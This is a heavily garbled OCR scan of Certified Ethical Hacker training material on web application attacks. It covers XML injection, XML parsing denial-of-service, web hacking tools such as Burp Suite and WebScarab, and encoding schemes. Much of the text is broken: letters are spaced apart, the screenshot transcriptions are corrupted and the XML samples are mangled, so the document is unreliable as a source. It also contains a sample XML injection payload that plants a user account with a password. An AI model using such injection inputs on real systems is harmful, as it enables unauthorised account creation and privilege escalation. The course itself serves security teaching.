mark@certifiedhacker.com</mail> </user> <u$er> <username>Jason</usemame> <password>attack</password> <userid>105</useridxmail>jason (Sjuggyboy.com
Creates new on the server
Web Service Attacks: XML Injection

T h e p ro c e s s in w h i c h t h e a t t a c k e r e n t e r s v a lu e s t h a t q u e r y X M L w i t h v a lu e s t h a t ta k e a d v a n ta g e o f e x p lo it s is k n o w n as an X M L i n j e c t i o n a tta c k . A t t a c k e r s i n j e c t X M L d a t a a n d tags i n t o u s e r i n p u t fie ld s t o m a n i p u l a t e X M L s c h e m a o r p o p u l a t e X M L d a ta b a s e w i t h b o g u s e n tr ie s . X M L i n j e c t i o n can be used t o bypa ss a u t h o r i z a t io n , e s c a la te p riv ile g e s , a n d g e n e r a t e w e b se rvice s DoS a tta c k s .
Server Side Code
<?xnl version 1. 0* "encodi ng- ' I SO 8859 l " ?> <usrs>
<us*r>
oo
h t t p : / / j 1 J g g y b o y . c o m / w 5 / 1 0 g i n . a 5 m x
Account Login
U sernam e Mark
<us r nMM >ganda 1*</ u sr nam > <pas3word>! a3</password> <userid>101</usrid> <r . a il> g a n d a lf 'r.iddleear th . com</r . a il>
</user>
Password
12345
E-mail ail
A
mark@>certifiedhacker.com</mailx/user> <user> <username>Jason</username> <password>attack</password> <userid>105</useridxmail>jason@>juggyboy.com
J^ u s e r 5
I
<usr> <userna!ne>Mar]c</userna1ne> <p33w0rd>12345</pa33v70rd> < usid> l02< /usrid> <r1ail>gandal3m iddlarth. com</m*il> < /usr>
!
;
< pas3w ord > attck< /p a3sw ord >

<userid>105</ujrid>
<ua*rna.*n#>jason</usrnam*>
</u 1 r!>
<nail>jasonijuggyboy.com</raail>
Creates new user account on the server
</us*r>
FIG U RE 1 3 .5 5 : X M L Injection
EC-C0UnCil

Web S e r v ic e s P a rsin g A ttack s

B
CEH
Parsing attacks exploit vulnerabilities and weaknesses in the processing capabilities of the XML parser to create a denial-of-service attack or generate logical errors in web service request processing
Attacker q ueries for web services with a grammatically correct SOAP document that contains infinite processing loops resulting in exhaustionof XML parserandCPU resources
Attackers send a payload that is excessively large to consume all systems resources rendering web services inaccessible to other legitimate users
Web Services Parsing Attacks

A p a rs in g a t t a c k ta k e s p la ce w h e n an a t t a c k e r su c c e e d s in m o d i f y i n g t h e file r e q u e s t o r s tr in g . T h e a t t a c k e r c h a n g e s t h e v a lu e s by s u p e r i m p o s in g o n e o r m o r e o p e r a t i n g s y s te m c o m m a n d s via t h e r e q u e s t. Pa rsin g is p o s s ib le w h e n t h e a t t a c k e r e x e c u te s t h e .b a t ( b a tc h ) o r .c m d ( c o m m a n d ) file s. Parsing a tta c k s e x p l o i t v u l n e r a b i l it ie s a n d w e a k n e s s e s in t h e p ro c e s s in g c a p a b ilit ie s o f t h e X M L p a r s e r t o c r e a t e a d e n ia l- o f- s e r v ic e a t t a c k o r g e n e r a t e lo g ic a l e r r o r s in w e b s e rv ic e r e q u e s t p ro c e s s in g . R e c u r s iv e P a y lo a d s X M L can e a sily n e s t o r a r r a n g e t h e e le m e n t s w i t h i n t h e sin g le d o c u m e n t t o a d d re s s t h e c o m p le x r e la t io n s h ip s . A n a t t a c k e r q u e r ie s f o r w e b se rv ic e s w i t h a g r a m m a t i c a l l y c o r r e c t SOAP d o c u m e n t t h a t c o n t a in s i n f i n i t e p ro c e s s in g lo o p s r e s u lt in g in e x h a u s tio n o f X M L p a r s e r a n d CPU r e s o u rc e s . O v e r s iz e P a y lo a d s In th e s e p a y lo a d s , X M L is r e l a t iv e l y v e r b o s e a n d p o t e n t i a l l y la rg e file s a re a lw a y s in t o t h e c o n s i d e r a t i o n o f p r o t e c t i n g t h e i n f r a s t r u c t u r e . P r o g r a m m e r s w ill l i m i t t h e d o c u m e n t 's size. A t t a c k e r s se n d a p a y lo a d t h a t is e x c e s s iv e ly la rg e t o c o n s u m e all s y s te m re s o u rc e s , r e n d e r i n g w e b se rv ic e s in a c c e s s ib le t o o t h e r l e g i t i m a t e users.
EC-C0UnCil

Web Service Attack Tool: soapUI
so a p U I is a o p e n s o u rc e fu n c tio n a l te s tin g t o o l, m a in ly used f o r w e b s e rv ic e te s tin g I t s u p p o rts m u lt ip le p r o to c o ls such as SOAP, REST, HTTP, JMS, AMF, and JDBC A tta c k e r can use th is t o o l t o c a rry o u t w e b s e rv ic e s p r o b in g , SOAP in je c tio n , X M L in je c tio n , and w e b services p arsin g a tta c k s
Copyright by EC-Cauactl. All Rights Reserved. Reproduction is Strictly Prohibited
Web Service Attack Tool: soapUI

T
S o u rc e : http://www.soapui.org so a p U I is an o p e n s o u r c e f u n c t i o n a l t e s t i n g t o o l , m a i n l y used f o r w e b se rv ic e t e s tin g . It s u p p o r t s m u l t i p l e p r o t o c o l s such as SOAP, REST, HTTP, JM S, A M F , a n d JDBC. It e n a b le s y o u t o c r e a te a d v a n c e d p e r f o r m a n c e rests v e r y q u ic k ly a n d r u n a u t o m a t e d f u n c t i o n a l te s ts . W i t h t h e h e lp o f t h is t o o l , a tt a c k e r s can e a sily p e r f o r m w e b se rv ic e s p r o b in g , SOAP in j e c t i o n , X M L in j e c t i o n , a nd w e b se rv ic e s p a r s in g a tta c k s .
EC-C0UnCil

soaplll 451 look Q #sktop U #lp
1 - 1 m M&
1 v D < 3 *n$ * o
[IPP r o je c ts B 1s a m p le s e r v ic e 3I S a r r p te S tr v ic e S o d i (5 b u y
L R e q u e s t1 R ecuest P rp p e fO e s P ro p erty J 1/alu e R eq u est 1 1 b P, M essao e5ize 277 in co cin g U T F -8 E n cb o irt K ttp V /V v ifV ...
I S a m p lc S c rv icc S o , p B in d n g ' Service Encpwnts \ WSD Conient
' Overvie/v
WS-lConplaxe |
.
l > C_l CD C3
0
xsam ple-ser\ke./.-sd
f lb :\ C :lM $ 0s V U ft1t 1is i,d :aV o d p d T u to ria b \ W S d W A O . v ic e ./ v s d

1:3earchRespor.3e,*/>
0 &M e s s a g e s
Comdex Type Aeon y nous C|~ Global Elenen Schemas
y 7 buyReque
>>"vsdl :!ressaae na1="3ear2hre3pcn3e v <a i:par- na1 g=3ear^&re3ulf= eienenc

>w s d l : n c : 3 a j c /<
j p art:
Q port: J CZ bu/Resp< I
>"vsdl:1re35age nan6="buySe<1ue3t< >/" vsdl:par- r-a2se= 3ess10nd* type=xsci: string <
: I hd b c irR e a mC ab g ir R e s p J Q& b g in _ f0jlII C 2b g 0jt R .e c B b o o u tR e s ihC b c o jt fa C 3s e a r c h R e
C3 buy_fadt I
> / u a d i
v - d l.p a z s n n ir - ,,b u y a s rin g " t-ypc x=<i. 3t u in g < :D e s s a jO
, <
3nc A d d re s s o flo v R cdi... tru e Jserane -,a s s v '0'd >xnan A utn cn tica... G lo b a lH TT... /V S S -P a s s ... W 55 rm eT... S S LK cyato fc S lo pS O A P... tnaole M 7 C Wfa ls e rw ceM TO M fa ls e I HireR cep... fa ls e FrtwvlOT .. fa lse bobe jl... (ru e E no xS cA C t... fa ls e F rw rtUnln f*l<# P roperfc # e
*p a rtsp
>" vsdl: 2 ressaaa na!1e="busRespoase< cwsdl.pars naue =i>uyrasuls^ / elenen^= tna :PuyRespoase > m dl :me:3a;e/< vsdl< tn 35ag naT*="Login_fa >"jltM3g v=dl:par<> / " nane="loginFault" type=*xsd:string
i/w s d l .n e s s g e < "> a d l - m i c a g n a n e = " l o g o u t _ f J u ltM g
vsdl:part r^xa="IoqoatFault'* typ-3="x3d: string V << _____
v a t;< $ M tp ;///v w w .e > ;a n p lc .0 T g /s e n u le /
FIGURE 13.56: soapUl Tool Screenshot
EC-C0UnCil

Web Service Attack Tool: XMLSpy

j Altova XMl Spy
C EH
Altova XMLSpy is the XML editor and development environment for modeling, editing, transforming, and debugging XML-related technologies
: Fic Eit Frcject >M - D T D fS c h cm o C c h c rn odesign X S L J X Q u c ry A u th en tic C on vert V ie w E rcw so

: WSDL SOAP Tools Window Help
a i a . a 12-, a j 1^ ip iia in ig iB !r ; . g 1 > ft, [^<s- < yB ! y; 0 0& ncyR 3 httpTVivsw'AS orgf20
,WHffiilFb
XSL O u tp u t, h tm t
m/XMLcnerria-1nsia
Ksi:foteach se 1ect="
n1:Firs1Name"> >
nee
xsl scnenraLocation h ttp /x m s 3y. neVag e r c/fschem astoersonn el C:\ eAaencvx$d'>
1<
-PciooraDoio-
span style-'col or: navy: font-fam i l/:Arf l; font size :12pt; font-we1ahtbold;">
I I i i I 1I
A
First Nairn
The
P e rso n n
NiM/FirctName j <lastName
0evgoodf Q 'h * A * n c > 3 A q e n ts
k c J :p p ty -to m p1 3 1 0 /
p!1n>
II I I : I II <
X | V<lu / AUrib
Call Stack Nn____ XSl:rcr-eech xsl:foeo=h vsl:f<y-*A?h xsl:for-ea:h
tJ () P e rvjt aDato t ) () l r s r t a n e
0 ( ) -cat'Jorre ra ( ) H e Concert Varabtes
D c c u n rn t
TheAgcm.yR3.xsll Tertiporarr lte$ * Thc.AgcncyR3.x5H Temporary Res_ Th*A{jf>nryR3 *H TMporrvR 1 TheAgencyR3.xsH Im porarv Res! Thc.AgcncyR3.xiH Temporary Re5< v Templates 3nfo Messaoes Trace
Elcniat
O a m e r t
le rf
E to n er*
ElOTtcr* <Fath-Watah
v | kocty Call Stack
h ttp ://w w w . altova.com

Web Service Attack Tool: XMLSpy

^ A lt o v a
2
S o u rc e : h t t p : / / w w w . a l t o v a . c o m XMLSpy is t h e XML e d ito r and d e v e lo p m e n t e n v iro n m e n t fo r m o d e lin g , e d it in g ,
t r a n s f o r m i n g , a n d d e b u g g in g X M L - r e l a t e d t e c h n o lo g ie s . It o f f e r s g r a p h i c a l s c h e m a d e s ig n e r , S m a r t Fix v a l i d a t i o n , a c o d e g e n e r a t o r , file c o n v e r te r s , d e b u g g e rs , p r o file r s , f u ll d a ta b a s e in te g ra tio n , and support fo r WSDL, SOAP, XSLT, X P ath, X Q u e ry , XBRL, and Open XML d o c u m e n t s , p lu s V isu al S t u d io a nd Eclipse p lu g -in s , a nd m o r e .
EC-C0UnCil

I Altova XMLSpy
i i File WSDL Edit Project Tools XML DTD/Schema Help Schema design XSL/XQuery Authentic C onvert
(s J S 1
View Browser W indow
SOAP
ID
IH j0 1 # U
U jB lliB i
I? I r a j f
http :11 w w w .w 3 .org/20 0 1/X M LS chem a-insta nee" x s i:sch e m a L o ca tio n http :/fxm lspy.net/agen cy/sch e m a s/p e rso n n el C:VTheAgency.xsd"> < P e rso na lD a ta > 33 N iki</F irstN a m e > ] < L a stN am e > D evgood</
frn i The Agency R3 C o ntext Name E) <> PersonalData FirstName ) { ! I Type Element Element Text Element Element XPath-W atch Niki Q A g e n ts
xsl:text> </span> xsl:for-each select=" n1:F irstN am e "> s p a n style="color:navy; fontfa m ily:Arial; fontsize:12pt; fo n t-w e ig h t:b o ld ; *> x si:a pp ly-te m p la te s/> 34 - sp an >
The -Personn
F ir s t N a m e :
<f
I I I I I I
Call Stack Name xsl:fo r-e a ch xsl:fo r-e a ch I Location TheAgencyR 3.xslt TheAgencyR 3.xslt TheAgencyR 3.xslt TheAgencyR 3.xslt TheAgencyR 3.xslt Templates In fo Result Document Tem porary Res! /v Tem porary Res! Tem porary Resi Tem porary Res! Tem porary Res! Trace NUM
@ X S L O utpu t.htm l X I Value / Attrib.. *
<> LastName l+l O Title Variables
xsl:fo r-e a ch xsl:fo r-e a ch body Call Stack
C o nte xt Step In to
Messages
Ln 5, Col 19
FIGURE 13.57: XMLSpy Tool Screenshot
EC-C0UnCil

^M odule Flow
So fa r, w e h a v e discu s sed w e b a p p li c a t i o n c o n c e p ts , t h r e a t s a s s o c ia te d w i t h w e b a p p li c a t i o n , a n d t h e h a c k in g m e t h o d o l o g y . N o w w e w i ll discuss h a c k in g to o ls . T h e se t o o l s h e lp a t ta c k e r s in r e t r i e v i n g s e n s itiv e i n f o r m a t i o n a n d also t o c r a f t a n d se nd m a lic io u s p a c k e ts o r r e q u e s ts t o t h e v i c t i m . W e b a p p li c a t i o n h a c k in g t o o l s a re e s p e c ia lly d e s ig n e d f o r i d e n t i f y i n g t h e v u l n e r a b i l it ie s in t h e w e b a p p li c a t i o n . W i t h t h e h e lp o f th e s e to o ls , t h e a t t a c k e r can e a sily e x p l o i t t h e i d e n t if ie d v u l n e r a b i l it ie s a n d c a r r y o u t w e b a p p l i c a t i o n a tta c k s .
W e b A p p Pen Testin g
W e b A p p C oncepts
S e c u rity Tools
W e b A p p T h re a ts
C o u n te rm e a s u re s
fs=9 S
b
H acking M e th o d o lo g y )
^ -
W e b A p p l i c a t i o n H a c k in g T o o ls
EC-C0UnCil

T his s e c tio n
lists a n d d e s c r ib e s v a r io u s w e b a p p li c a t i o n
h a c k in g t o o l s such as B u r p S u ite
P r o fe s s io n a l, C o o k ie D ig g e r , W e b S c a r a b , a n d so on.
EC-C0UnCil

Web Application Hacking Tool: Burp Suite Professional
S o u rc e : h t t p : / / w w w . p o r t s w i g g e r . n e t B u rp S u ite is an i n t e g r a t e d p l a t f o r m f o r p e r f o r m i n g s e c u r it y t e s t i n g o f w e b a p p lic a tio n s . Its v a r io u s t o o l s w o r k t o g e t h e r t o s u p p o r t t h e e n t i r e t e s t i n g p ro ce ss, f r o m in itia l m a p p i n g and a na lys is of an a p p li c a t i o n 's a tta c k s u rfa c e , th ro u g h to fin d in g and e x p lo itin g s e c u r it y v u l n e r a b i l i t i e s . B u rp S u ite c o n t a in s k e y c o m p o n e n t s such as an i n t e r c e p t i n g p r o x y , a p p li c a t i o n a w a r e s p id e r, a d v a n c e d w e b a p p li c a t i o n s c a n n e r, i n t r u d e r t o o l , r e p e a t e r t o o l , s e q u e n c e r t o o l , e tc .
EC-C0UnCil

burp suite free edition v1.4.01 [D urp intruder repeater wmdo* A C oul m fruder rapMlSf MQM decoder ' com parer ' 0f* 0ns spider H erts fec sftow vtg lit *em* lull* pa.icads opons request
0
intruder attack 1
L 21
I target posiions
attack type *nicer 2 paytoadposfrons ill thld-f l.41500402:3>>8 IS Mott: t*4 . 1* .bing. net
target position 1^
posftont | pajloads pajtoad | status

]200
erro r 6m e
1 2
W eS ervice A tta c k 400 weSeMce *itac* 200
iengt> 10443 193 10443
com m ent I s *
length 1
.-51.1* HTTP 7 7 7
request
response
Proxy-Connection: keep-alive User-Agent: Hori11* S.0 iVindows 1 J T f .2 ; W O Vi 4 ! Applefebrit/S37.4 KHTHL, like Oeckoi Chroe/::.0. 1 : : 9 .S4 Sfaci/S37.4 Accept: / Petecec: h ttp :// vvv.bia^.co/ u u f 1 set:ch?qablkes(lda<CCC7670 CSC1CD3A9DIEABE2t 3SIn0S75D 12S944FOPHIQFPBA Accept-Encoding: gzip,delat,sdeh
raw paiarr.s headers he! lo r r /th?ld-1.4M7< lS0048::314pld-l. 1 HTTP/1.1 Host: t 3 4 .an.b 1 ng.net Pcoxy-Connection: keep-alive Osec-Agent: B osilU/5.0 <V1n40v3 NT .2 1 V0V4) AppleVebr.lt/S37.4 KHT1L. Ilk Gecko* Chr one/22.0.1229.94 S*farl/S37.4 Accept: /
Mtmr:
http: //m .b in g .c o a / lautges/ search7q-blkes 41 d-*CCC7 70 f SC1CD3A9D:EABESt3 5lFE8575D1:594tr0RH-I0rPBA Accept-Encoding: gsip,de<late,sdeh Accept-Language : en-U3. en; q0 . 8 Accept-Charset: ISO-OOS9-1,utf-0;q-0.7,;q-0.3 <UUW lAtt /lAM
*nnnrn[
1m a*
FIGURE 13.58: Burp Suite Professional Tool Screenshot
EC-C0UnCil

Web Application Hacking Tool: CookieDigger

j J J It works by collecting and analyzing cookies issued by a web application for multiple users
C EH
CookieDigger helps identify weak cookie generation and insecure implem entations of session management by web applications
The tool reports on the predictability and entropy of the cookie and whether critical information, such as user nam e and password, are included in the cookie values
Foundstone Cookie Digger Foundstone | CookieDigger

'/*tea URLs [y/vnrn.gmai com/ ',accounts gootfe coro/SeracelognA lb f_soace et tnpv .3A"2.F 2 .. ffrai
'B il.9& egl*.con/_,TaM >1e/_/)r/>Mr.lrji^n^vMfXoWI'Ewfc. n/rv*1/|

httpsy/tnal.google oorvmalAvO.Ai 28v1ew*ptver^hrt4nw*r4 https/A nadgoogle cwn/VnaHi/UAj 2hinâpl w nchH *>6 t14 https //tn! google c o m / m s l ' U / O A j ct t i U M 1 4 httpsy/Wal.google corvml'u/Q/'Vw 1 https .AVnsI google axn/_/'1nad<t1c/_/i/^Mn/ 1 jt4vverX0WKEe4c tr https //htl google con/h>l/U/t)AM2>v>ew^splM ercW4r*>t1n4 httpsy/Wl.googl*.CffV, mlU/0. ,J 24vew<plvar*chfiHrw&-tr* https //Vnal google co n > V 1 > a lA ^ 0 '> j28vTew^>spUw <1WWrQ *ty>4 https //hl google co!nATwlAj/t)As*ft1rtt 1yc fts /Amltvp dl HardAdnwvhtir httpy/maim.oom/ http <V*ww r convlognvtrfy y c http y/m*l r.o0ffvr*wmlAt*ndphp>^d*U^
' (jwd ***p e
jdfn
a b o u tW a r*
http //hotmatl/ http y/ww*.f>otml com/
B a ck
M o d>
http://w ww .m cafee.com
Web A pplication H acking Tool: C ookieD igger

S o u rc e : h t t p : / / w w w . m c a f e e . c o m C o o k ie D ig g e r is a to o l th a t d e te c ts v u ln e r a b l e by w e b c o o k ie g e n e r a t io n and th e in s e c u r e on th e
im p le m e n ta tio n
o f session
m anagem ent
a p p lic a tio n s . This t o o l
is b a se d
c o ll e c t i o n a n d e v a l u a t i o n o f c o o k ie s b y a w e b a p p l i c a t i o n used by m a n y users. C e r t a in t y a n d e n t r o p y o f t h e c o o k ie a re f a c t o r s o n w h i c h t h e t o o l relies. T h e c o o k ie v a lu e s c o n t a i n v a lu a b le i n f o r m a t i o n such as t h e lo g in d e ta ils o f t h e u s e r ( u s e r n a m e a n d p a s s w o r d ).
EC-C0UnCil

Foundstone Cookie Digger

File Help
Foundstone | CoohieDigger
Vtated URLs /http//Www gmad com https://accounts google.com/ServiceLoginAuh httpsJ/m e i google com/_/mad-stabc/_/js/man/m_ 1/rt41/ver*X06 1 W Kse4k en /*v*1/amf httpsJ/m M google com/mai/u/OAj 24vtewbsp4verohhl4rv&7 1bn4 httpsJ/m a i google com/mail/u/QAji-2&v1ewbsp4ver0W4fw 8mbn4 httpsV/toai google com/ma!l/u/QAjt24v1ewbsp4ver*ohN4rw8mbn4 https //mad googlecom/ma l/u/Q/'> shva https://mad google com/_/madstafcc/_/j3/man/m_1Jt/rt v'verX lW KEse k en7$v1/a<nf httpsV/mai google com/mail/u/0Aj1*24v1ew6sp4verohN4rw&T1bn4 https://mai google com/ma!l/u/0Ajt2Sv1ewbsp&ver*ohH4rw&7*o4 google com/marf/u/0/'> u1-24v>ew-6sp4ver-ohH4rw&nbr14 https//ma< google com/mad/u/0Aj!4tml4zyc res //!esetup dB/HardMmm htm
; POST Data f_sourceret r ttp %3A%2F%2fmai n .com 2Fnewml./ %2Frt>oxphpJJgfrm*<nai!f_1d*rmatthews4 f _pwdsweetpte
06
http //w w w m com/login venfy php http //m ail n com/newmad/ftemdex php , msgd 4type about blank http //hotm aJ/ http //W ww hotmad com /
User ID
|jg
Password
I*
Back
Nod
FIGURE 13.59: CookieDigger Tool Screenshot
EC-C0UnCil

Web Application Hacking Tool: WebScarab
C EH
W e b S c a ra b is a f r a m e w o r k f o r a n a ly z in g a p p lic a tio n s t h a t c o m m u n ic a te u s in g t h e HTTP a n d HTTPS p r o to c o ls I t a llo w s t h e a tta c k e r t o r e v ie w a n d m o d if y r e q u e s t s c r e a te d b y t h e b r o w s e r b e fo r e th e y a re s e n t t o t h e s e rv e r, a n d t o r e v ie w a n d m o d if y r e s p o n s e s r e tu r n e d f r o m t h e s e r v e r b e f o r e t h e y a re r e c e iv e d b y t h e b r o w s e r
File View
lools
Help Proxy Manual Request WebServices Spider Extensions SessionID Analysis S c rip te d
F ra g m e n ts
Summary Message log 2 Summary
Compare
Tree Selection niters conversation list Url ? (15 http://www.owasp.ora:80/ n banners/ o- n imaaes/ 9 (15 index php/ O Maln_Page o- skins/ Path Host http:flWww owasp org BU /skins/monobook/mam ' / http:fA1 vww.owasp.org 80 /skins/common/IEFixes http://www.owasp.org.80 /skins/common/commo http://www.owasp org 80 /index php/Mam_Page http://www.owasp.org.80l/ Methods GET Status | Sel-Cookie 301 Moved.. 200 OK Status
2DUOK
Comments
GET
Scnpts E
'UUb/UbOT
O fc I
Origin Proxy Proxy Proxy Proxy
2006/06/23 2006/06/23
GET GET
http://w w w .ow asp.org

Web A pplication H acking Tool: WebScarab

S o u rc e : h t t p : / / w w w . o w a s p . o r g W e b S c a r a b is a f r a m e w o r k f o r a n a ly z in g a p p li c a t i o n s t h a t c o m m u n i c a t e u sin g t h e HTTP a nd HTTPS p r o t o c o ls . It is w r i t t e n in Java, a n d is t h u s p o r t a b l e t o m a n y p la t f o r m s . W e b S c a r a b has s e v e ra l m odes of o p e ra tio n , im p le m e n te d by a num ber of p lu g in s . It o p e ra te s as an i n t e r c e p t i n g p ro x y , a ll o w i n g t h e a t t a c k e r t o r e v i e w a n d m o d i f y r e q u e s ts c r e a te d b y t h e b r o w s e r b e f o r e t h e y a re s e n t t o t h e s e rv e r, a n d t o r e v i e w a n d m o d i f y r e s p o n s e s r e t u r n e d f r o m t h e s e rv e r b e f o r e t h e y a re r e c e iv e d by t h e b r o w s e r . It is e v e n a b le t o i n t e r c e p t b o t h HTTP a nd HTTPS c o m m u n ic a tio n . The o p e ra to r can also re v ie w th e c o n v e rs a tio n s (requests a nd
r e s p o n s e s ) t h a t h a v e passed t h r o u g h W e b S c a r a b .
EC-C0UnCil

W e b S c a ra b Iools Help Proxy Manual Request WebServices Spider Extensions SessionID Analysis Scripted Fragments Fuzzer
File View
Summary Message log E l Summary
Compare
11
a 1
*
Tree Selection filters conversation list Url ? http://www.owasp.org:80/ 3 ] banners/ o- C3 images/ ? Indexphp/ Q Main_Page oskins/ -----: ate Method 2U0BZDE/2XT Gfc 1 2006/06/23... GET 2006/06/23. GET 2006/06/23 GET 2006/06/23... GET Methods GET Status Set-Cookle 301 Moved... 200 OK Status 2UU UK 200 OK 200 OK 200 OK 301 Moved... Origin Proxy Proxy Proxy Proxy Proxy I Comments Scripts J 0 A
GET --Host Path http://www. owas p.0rg:8U /SKins/monoDOOKfmain 'N http:/ / Www.owas p.0rg:80 /skms/common/IEFixes. http://www. owa sp.0rg:80 /skins/common/commo http://Www.owasp.org 80 /index php/Main_Page http://Www.owasp.org:80 / III Parameters
ID 4 3
2
1
i.27/63.56
FIGURE 13.60: WebScarab Tool Screenshot
EC-C0UnCil

Web A pplication H acking Tools I CEH

M
a s Instant Source
h ttp ://w w w . blazingtools.com
HttpBee
h ttp ://w w w . oOo. nu
w3af
h ttp ://w 3 a f. sourceforge, net ^ ^4 )
Teleport Pro
h ttp ://w w w . tenmax. com
GNU Wget
http ://g nu w in 3 2 . source forge, net
WebCopier
h ttp ://w w w . maximumsoft.com
BlackWidow
h ttp ://so ftb ytelab s. com
&
HTTTRACK
h ttp ://w w w . httrack. com
f3
cURL
h ttp ://c u r I. haxx. se
MileSCAN ParosPro
h ttp ://w w w . miles can. com
\ Web A pplication H acking Tools

A f e w m o r e t o o l s t h a t ca n be used f o r h a c k in g w e b a p p li c a t i o n s a re lis te d as f o l lo w s : I n s ta n t S o u rc e a v a ila b le a t h t t p : / / w w w . b l a z i n g t o o l s . c o m w 3 a f a v a ila b le a t h t t p : / / w 3 a f . s o u r c e f o r g e . n e t G N U W g e t a v a ila b le a t h t t p : / / g n u w i n 3 2 . s o u r c e f o r g e . n e t B l a c k W i d o w a v a ila b le a t h t t p : / / s o f t b y t e l a b s . c o m cURL a v a ila b le a t h t t p : / / c u r l . h a x x . s e H t t p B e e a v a ila b le a t h t t p : / / w w w . 0Q0.nu T e l e p o r t Pro a v a ila b le a t h t t p : / / w w w . t e n m a x . c o m W e b C o p i e r a v a ila b le a t h t t p : / / w w w . m a x i m u m s o f t . c o m H i l l RACK a v a ila b le a t h t t p : / / w w w . h t t r a c k . c o m M ile S C A N P a rosP ro a v a ila b le a t h t t p : / / w w w . m i l e s c a n . c o m
EC-C0UnCil

M o d u le F lo w
W e b A p p Pen Testing
0 I , &
S ecurity Tools
W e b A p p T h rea ts
C o un term ea su re s
W e b A p p lic a tio n H acking Tools
^M odule Flow
So fa r, w e h a ve d iscu sse d v a r io u s c o n c e p t s such as t h r e a t s a s s o c ia te d w i t h w e b a p p lic a tio n s , h a c k in g m e t h o d o l o g y , a nd h a c k in g to o ls . All th e s e t o p ic s t a l k a b o u t h o w t h e a t t a c k e r b re a k s i n t o a w e b a p p li c a t i o n o r a w e b s i t e . N o w w e w ill discuss w e b a p p li c a t i o n c o u n t e r m e a s u r e s . C o u n t e r m e a s u r e s a re t h e p r a c tic e o f u s in g m u l t i p l e s e c u r it y s y s te m s o r te c h n o lo g ie s to p re ve n t i n t r u s io n s . These a re th e key co m p o n e n ts fo r p ro te c tin g a nd s a f e g u a r d in g t h e w e b a p p li c a t i o n a g a in s t w e b a p p li c a t i o n a tta c k s .
/jj& M k
S e cu rity Tools
.r" C ou n te rm e a su re s e5 = (j ' H acking M e th o d o lo g y
m
W e b A p p lic a tio n H acking Tools vf 1
EC-C0UnCil

T his s e c tio n h ig h lig h ts v a r io u s w a y s in w h i c h y o u can d e f e n d a g a in s t w e b a p p li c a t i o n a tta c k s such as SQL in j e c t i o n a tta c k s , c o m m a n d i n j e c t i o n a tta c k s , XSS a tta c k s , e tc.
EC-C0UnCil

E n c o d in g S c h e m e s
Web applications employ different encoding schemes for their data to safely handle unusual characters and binary data in the way you intend
C EH
URL e n c o d in g is t h e p ro c e s s o f c o n v e rtin g URL in to v a lid ASCII f o r m a t so t h a t d a ta c a n b e s a fe ly t r a n s p o r te d o v e r HTTP URL e n c o d in g re p la c e s u n u s u a l ASCII c h a ra c te rs w ith "% " fo llo w e d b y t h e c h a ra c te r's t w o - d ig it ASCII c o d e e x p re s s e d in h e x a d e c im a l s u c h as: %3 d
a %0a New line %20 space
A n H T M L e n c o d in g s c h e m e is used t o re p re s e n t u n u s u a l c h a ra c te rs so t h a t th e y c a n be s a fe ly c o m b in e d w ith in an HTML d o c u m e n t It d e fin e s s e v e ra l H T M L e n titie s t o re p re s e n t p a r tic u la rly u s u a l c h a ra c te rs s u ch as:
Encoding Schem es
HTTP p r o t o c o l a n d t h e B o th th e s e H T M L la n g u a g e a re t h e t w o a re t e x t b ase d. W e b m a jo r c o m p o n e n ts e m p lo y of web e n c o d in g a p p lic a tio n s . co m p o n e n ts a p p li c a t i o n s
s c h e m e s t o e n s u r e b o t h th e s e c o m p o n e n t h a n d le u n u s u a l c h a r a c te r s a n d b i n a r y d a t a s a fe ly . T h e e n c o d i n g s c h e m e s in c lu d e :
m
U R L E n c o d in g URLs a re p e r m i t t e d t o c o n t a i n o n l y t h e p r i n t a b l e c h a r a c te r s o f ASCCI c o d e w i t h i n t h e r a n g e 0 x 2 0 - 0 x 7 e in c lu s iv e . Se vera l c h a r a c te r s w i t h i n t h is r a n g e h a v e sp ecial m e a n in g
w h e n t h e y a re m e n t i o n e d in t h e URL s c h e m e o r HTTP p r o t o c o l . H e n c e , such c h a r a c te r s are re s tric te d . URL e n c o d i n g is t h e p ro ce ss o f c o n v e r t i n g URLS i n t o v a lid ASCII f o r m a t so t h a t d a ta can be s a fe ly t r a n s p o r t e d over HTTP. URL e n c o d i n g r e p la c e s u n u s u a l ASCII c h a r a c te r s w i t h
"% "
f o l l o w e d b y t h e c h a r a c t e r 's t w o - d i g i t ASCII c o d e e x p r e s s e d in h e x a d e c im a l su ch as:

Q Q 9 %3d %0a %20 New l i n e space
EC-C0UnCil

> ***
H T M L E n c o d in g T h e H T M L e n c o d i n g s c h e m e is u sed t o r e p r e s e n t u n u s u a l c h a r a c te r s so t h a t t h e y can be
s a fe ly e n t e r e d w i t h i n an H T M L d o c u m e n t as p a r t o f its c o n t e n t . T h e s t r u c t u r e o f t h e d o c u m e n t is d e f i n e d by v a r io u s c h a r a c te r s . If y o u w a n t t o use t h e s a m e c h a r a c te r s as p a r t o f t h e
d o c u m e n t 's c o n t e n t , y o u m a y fa c e p r o b l e m . T his p r o b l e m can be o v e r c o m e b y u sin g H T M L e n c o d in g . It d e fin e s s e v e ra l H T M L e n t i t i e s t o r e p r e s e n t p a r t i c u l a r l y usual c h a r a c te r s such as: Q e e &am p; & it; & g t; & < >
EC-C0UnCil
Ethical Hacking and Countermeasures Hacking W eb A pplications
Exam 312-50 C ertified Ethical Hacker
E n c o d in g S c h e m e s
(Cont1 (!)
B ase64 Encoding
Base64 encoding scheme represents any binary data using only printable ASCII characters
C EH
Hex Encoding
HTML encoding schem e uses hex value of e ve ry character to represent a collection of characters for transm itting binary data
tt
Example: Hello Jason A125C458D8 123B684AD9
Encoding Schem es (Contd)

U n ic o d e E n c o d in g U n ic o d e is a c h a ra c te r e n c o d in g
Base 64 Encoding
Base 64 sche m e s a re re p re s e n ts any b in a ry used t o d a ta encode o n ly b in a ry d a ta . A Base 64 e n c o d in g s chem e u sing p rin ta b le ASCII c h a ra c te rs . safe tra n s m is s io n over U s u a lly it is also of e v e ry
Hex Encoding
A n H T M L e n c o d in g sc h e m e uses h e x v a lu e c h a ra c te r to re p re s e n t a c o lle c tio n o f c h a ra c te rs f o r tra n s m ittin g b in a ry da ta . E xa m ple:
s t a n d a r d t h a t is d e s ig n e d t o s u p p o r t a ll o f th e w r i t i n g s y s te m s u s e d in th e w o r l d . U n ic o d e is e x c l u s iv e l y u s e d t o hack web a p p lic a t i o n s . a tta c k e rs to U n ic o d e bypass e n c o d in g th e filt e r s . 1 6 - b i t U n ic o d e e n c o d in g : It r e p la c e s unusual U n ic o d e code U n ic o d e p o in t h e lp s
